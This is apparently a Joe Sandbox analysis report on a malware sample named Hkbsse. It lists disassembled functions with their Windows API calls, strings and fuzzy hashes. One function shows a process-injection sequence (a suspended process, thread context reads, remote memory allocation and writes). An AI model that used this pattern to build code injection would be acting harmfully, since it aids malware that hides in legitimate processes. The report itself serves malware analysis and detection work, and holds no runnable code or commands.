Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: 5c0640174703527ed6f8b364871779061e85b12489ec8e9a1cb2ada480b8941d
Instruction ID: 1cebdff956f35301b228ad929a57138ae6f3de9d755a9d83023037c47f442567
Opcode Fuzzy Hash: 5c0640174703527ed6f8b364871779061e85b12489ec8e9a1cb2ada480b8941d
Instruction Fuzzy Hash: 433108B1B001459BDB08CB78CD887ADBB72AB85314F20862EE014F77D6D77D9D818759

Function 0040A01E Relevance: 1.6, APIs: 1, Instructions: 109sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0040A021
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: fa10ccbffac2429ffa5c8e7dce009efc98999f4f31f1e09005577bb49dd2a42d
Instruction ID: d3bbf606b6e55869b7142eaea4e756d31079f1076668f462ee9c9223f2e79c38
Opcode Fuzzy Hash: fa10ccbffac2429ffa5c8e7dce009efc98999f4f31f1e09005577bb49dd2a42d
Instruction Fuzzy Hash: 75312C71A002049BEB08CF78DD8979CBB72AF85314F24832EE014BB3D5D77E9994875A

Function 0040A153 Relevance: 1.6, APIs: 1, Instructions: 108sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0040A156
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: 1fb34028957fbad8ad15bac41bce69246fc8f6ad56f825af6c6a28453bf2015a
Instruction ID: ea6d2b3edeecd4a8b2092c112018144efe237778b096063fe3c5670888a6cec2
Opcode Fuzzy Hash: 1fb34028957fbad8ad15bac41bce69246fc8f6ad56f825af6c6a28453bf2015a
Instruction Fuzzy Hash: AC3149717002449BEB08CB78DD8879DBB72AF86314F20832EE415BB3D5C77E9990871A

Function 0040A288 Relevance: 1.6, APIs: 1, Instructions: 107sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0040A28B
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: 912ea6bc91e0b0eaf82f2289b4a23cfdd88ed99a732151ff877500205a877ed0
Instruction ID: 23154b51c0d16e6e100750abe3252d6bf9979cfe56f34b73256cc9737246f757
Opcode Fuzzy Hash: 912ea6bc91e0b0eaf82f2289b4a23cfdd88ed99a732151ff877500205a877ed0
Instruction Fuzzy Hash: 9D315A716002049BDB08DBB8CD8979CBB72EF85318F20C22EE454B73D6D77E9990875A

Function 0040A3BD Relevance: 1.6, APIs: 1, Instructions: 106sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0040A3C0
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: 212accfea0ad508475d9c8cfc21d10c025f87daaa25036cfca49317c381121ba
Instruction ID: 34c3e159bd4fb313d477a01b2c53c72d92f0e78b8551a06dd44ddaf8c8be27fd
Opcode Fuzzy Hash: 212accfea0ad508475d9c8cfc21d10c025f87daaa25036cfca49317c381121ba
Instruction Fuzzy Hash: 4E3138716002048BDB08DB7CCD8979CBB72EF86318F20822EE414B73D2C7BD9995871A

Function 0040A4F2 Relevance: 1.6, APIs: 1, Instructions: 105sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0040A4F5
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: bd8dc60d1d497a72f33c94d7148e61f65d592771ea970fdf08db7a76deddff7f
Instruction ID: ac5e2a2e5b3d6c9b7e4aed64555241d561b08286d21f952afa2464d3d99d4b14
Opcode Fuzzy Hash: bd8dc60d1d497a72f33c94d7148e61f65d592771ea970fdf08db7a76deddff7f
Instruction Fuzzy Hash: 993138716002049BDB08CB78CD8979DBB72EB85318F20822EE514B73D6D77DD994875A

Function 0040A627 Relevance: 1.6, APIs: 1, Instructions: 104sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0040A62A
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: e4ebd6f3d036176a9f99e85adacf4efdb366531d57aa73623eba15efbef8739a
Instruction ID: ed049e06fe5b826b2ef68aca5c6ebce0050a82e30e3e317a089724e43374e015
Opcode Fuzzy Hash: e4ebd6f3d036176a9f99e85adacf4efdb366531d57aa73623eba15efbef8739a
Instruction Fuzzy Hash: C8316E716002048BDB08CB78CE8979CB7729B81318F24832ED050B73D1D73E99948759

Function 00436C5B Relevance: 1.6, APIs: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A5A1: GetLastError.KERNEL32(?,00000000,?,004368EA,00000000,00000000,?,?,0043751E,004065D9,00000000,00000000), ref: 0043A5A6
Part of subcall function 0043A5A1: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0043751E,004065D9,00000000,00000000), ref: 0043A644

_free.LIBCMT ref: 00436CFE

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 85484cf592e858d368dd57998a0696b009f91a1ca764e90996b499c0fdc006ed
Instruction ID: 2d87dcec4b097fd5d3ba1f17b3b47059364c8f3beccdb872c498c520489c74a2
Opcode Fuzzy Hash: 85484cf592e858d368dd57998a0696b009f91a1ca764e90996b499c0fdc006ed
Instruction Fuzzy Hash: 27110872D01219BFCF00AFA4980179E7BB0EF08325F21E16FF855A61D1DA788A40C789

Function 0078442D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0078447E

Memory Dump Source

Source File: 00000015.00000002.4556167209.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_783000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 7f7b9bc5d639fd1723dc8466a8791d30acfc01a457fc8ff9cc32c02ece8ad912
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: F5113C79A40208EFDB01DF98C989E98BBF5AF08351F058094F9489B362D375EA50DF80

Function 00416AD0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00416B55

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: cac7f2b5a087319ef8a993f9f35631e00fcbc57f086c110b4cc2acb95cac2188
Instruction ID: c1e93730c487d231fcacd5e21394032297f98adc8d76a38ec19626488e6fadf3
Opcode Fuzzy Hash: cac7f2b5a087319ef8a993f9f35631e00fcbc57f086c110b4cc2acb95cac2188
Instruction Fuzzy Hash: 06F08671E10614BBC700BB699D0675E7B74E746B24F90025EE814672D1E6786A0487DB

Non-executed Functions

Function 006F7217 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 006F7244
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 006F72A2
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 006F72BB
GetThreadContext.KERNEL32(?,00000000), ref: 006F72D0
ReadProcessMemory.KERNEL32(?,00458E08,?,00000004,00000000), ref: 006F72F0
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 006F7332
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 006F734F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 006F7408

Strings

VUUU, xrefs: 006F70B8

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: VUUU
API String ID: 3796053839-2040033107
Opcode ID: 22c2605f09107def937ae551f4ccf5436792bac80988d22b45d6996278ec0893
Instruction ID: 4a7499ac2e9d91707d099de9b7fdfe9ab970398f2ed93cd88d0b8efa872749c2
Opcode Fuzzy Hash: 22c2605f09107def937ae551f4ccf5436792bac80988d22b45d6996278ec0893
Instruction Fuzzy Hash: C0416C75244301BFE7619B54DC06FAA7BE9BF88B15F404429F784E62E0D7B0E904CB9A

Function 0071101A Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0071111D
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00711169

Part of subcall function 00712864: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00712957

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 007111D5
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007111F1
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00711245
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00711272
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 007112C8

Strings

(, xrefs: 00711129

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 553095efb5d9da27820889a6ffc0bd96821c51f409c3651e11de9656da88818b
Instruction ID: 0e83507d4b2d363e6f66108459fe3a19eb7a53bd6f42a0a953ff9541f3c3216e
Opcode Fuzzy Hash: 553095efb5d9da27820889a6ffc0bd96821c51f409c3651e11de9656da88818b
Instruction Fuzzy Hash: 0DB17B70A00615EFDB18CF68C981BBEB7B5FF48700F548269EA05AB685D374ED81CB94

Function 00711809 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00712F03: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00712F16

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 0071181B

Part of subcall function 00713016: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00713040
Part of subcall function 00713016: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 007130AF

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 0071194D
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 007119AD
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 007119B9
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 007119F4
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00711A15
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00711A21
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00711A2A
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00711A42

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: b48f3234bd8d6591f7cc7124dfe5bfb2c00bab5c43b0519a82ba44786c3fe644
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: 4E816B71E002259FCB18CF6CC584AADBBB2FF48314B5581ADD555AB782D734ED92CB80

Function 0071EE4F Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0071EE88

Part of subcall function 00719136: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00719157

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0071EEEE
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0071EF06
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0071EF13

Part of subcall function 0071E9B6: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0071E9DE
Part of subcall function 0071E9B6: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0071EA76
Part of subcall function 0071E9B6: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0071EA80
Part of subcall function 0071E9B6: Concurrency::location::_Assign.LIBCMT ref: 0071EAB4
Part of subcall function 0071E9B6: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0071EABC

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 408ce37d6a7c8c1258ba538c9c045a9760660f01c5c2507fc7694a852da23b7d
Instruction ID: 798eea31131e25f15d3f6bed87aa5cac6bb7e5ee58399e7c6083e0b0d923c205
Opcode Fuzzy Hash: 408ce37d6a7c8c1258ba538c9c045a9760660f01c5c2507fc7694a852da23b7d
Instruction Fuzzy Hash: 3B518F35A00215EBCF24EF54C89ABEDB775AF44710F1440A8ED066B3D2CB35AE86CB91

Function 00732EA7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON

Download Yara Rule

Strings

`Ds, xrefs: 00732EC2, 0073304B, 00733274, 0073320E, 0073309A, 00733020
`Ds, xrefs: 007332CE, 0073310C, 00733114

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID: `Ds$`Ds
API String ID: 0-117381168
Opcode ID: 14b5307bef44c41b13618be22e02f8b6748635c597c93742125e2bd4610d34a2
Instruction ID: ba9ff75d3287743ffb8c162b43cfe2019fc70f3ef01079a0c061fa38b90b221e
Opcode Fuzzy Hash: 14b5307bef44c41b13618be22e02f8b6748635c597c93742125e2bd4610d34a2
Instruction Fuzzy Hash: C7F13F71E016199FEF24CFA8C8806AEFBB1FF48314F158269E915AB345D735AE41CB90

Function 0041C708 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0041C70E
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041C71C
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041C72D
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041C73E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041C74F
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0041C760
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0041C771
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0041C782
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0041C793
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0041C7A4
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0041C7B5
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0041C7C6
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0041C7D7
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0041C7E8
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0041C7F9
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0041C80A
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0041C81B
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0041C82C
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0041C83D
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0041C84E
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0041C85F
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0041C870
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0041C881
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0041C892
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0041C8A3
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0041C8B4
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041C8C5
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0041C8D6
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041C8E7
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041C8F8
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0041C909
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0041C91A
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0041C92B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0041C93C
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0041C94D
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0041C95E
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0041C96F
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0041C980
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0041C991
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0041C9A2
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0041C9B3

Strings

CloseThreadpoolTimer, xrefs: 0041C7DD
GetCurrentPackageId, xrefs: 0041C865
SubmitThreadpoolWork, xrefs: 0041C964
LCMapStringEx, xrefs: 0041C9A8
SetFileInformationByHandle, xrefs: 0041C898
CreateSemaphoreW, xrefs: 0041C788
SleepConditionVariableCS, xrefs: 0041C8ED
InitializeCriticalSectionEx, xrefs: 0041C755
CreateSymbolicLinkW, xrefs: 0041C859
CreateSemaphoreExW, xrefs: 0041C799
CloseThreadpoolWait, xrefs: 0041C810
AcquireSRWLockExclusive, xrefs: 0041C90F
WakeConditionVariable, xrefs: 0041C8CB
InitializeConditionVariable, xrefs: 0041C8BA
InitializeSRWLock, xrefs: 0041C8FE
WakeAllConditionVariable, xrefs: 0041C8DC
GetFileInformationByHandleEx, xrefs: 0041C887
FlsSetValue, xrefs: 0041C744
ReleaseSRWLockExclusive, xrefs: 0041C931
GetSystemTimePreciseAsFileTime, xrefs: 0041C8A9
FlsAlloc, xrefs: 0041C716
FlsGetValue, xrefs: 0041C733
CreateThreadpoolTimer, xrefs: 0041C7AA
WaitForThreadpoolTimerCallbacks, xrefs: 0041C7CC
GetTickCount64, xrefs: 0041C876
TryAcquireSRWLockExclusive, xrefs: 0041C920
CreateEventExW, xrefs: 0041C777
SetThreadpoolWait, xrefs: 0041C7FF
kernel32.dll, xrefs: 0041C709
SleepConditionVariableSRW, xrefs: 0041C942
CompareStringEx, xrefs: 0041C986
SetThreadpoolTimer, xrefs: 0041C7BB
CloseThreadpoolWork, xrefs: 0041C975
GetCurrentProcessorNumber, xrefs: 0041C843
GetLocaleInfoEx, xrefs: 0041C997
InitOnceExecuteOnce, xrefs: 0041C766
CreateThreadpoolWait, xrefs: 0041C7EE
FreeLibraryWhenCallbackReturns, xrefs: 0041C832
FlushProcessWriteBuffers, xrefs: 0041C821
CreateThreadpoolWork, xrefs: 0041C953
FlsFree, xrefs: 0041C722

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
Instruction ID: 0f84095e92aac1c2e0bb15fd21b29d90348e2d41669b35d16af1684e6b0aebcd
Opcode Fuzzy Hash: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
Instruction Fuzzy Hash: 38612875952711EBD7016FB4FC0DF893AB8AA09B53B608537F906D21B2E6F88004CB6D

Function 0042447E Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 004244D8

Part of subcall function 004242B9: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 00424385
Part of subcall function 004242B9: InitializeSListHead.KERNEL32(?), ref: 0042438F

ListArray.LIBCONCRT ref: 0042450C
Hash.LIBCMT ref: 00424575
Hash.LIBCMT ref: 00424585
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0042461A
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424627
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424634
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424641

Part of subcall function 00429BE1: std::bad_exception::bad_exception.LIBCMT ref: 00429C03

RegisterWaitForSingleObject.KERNEL32(?,00000000,004279B5,?,000000FF,00000000), ref: 004246C9
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004246EB
GetLastError.KERNEL32(0042542B,?,?,00000000,?,?), ref: 004246FD
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0042471A

Part of subcall function 0041FB4A: CreateTimerQueueTimer.KERNEL32(?,00000001,0000000A,?,?,+TB,00000008,?,0042471F,?,00000000,004279A6,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0041FB62

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00424744

Strings

rKB, xrefs: 00424497

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

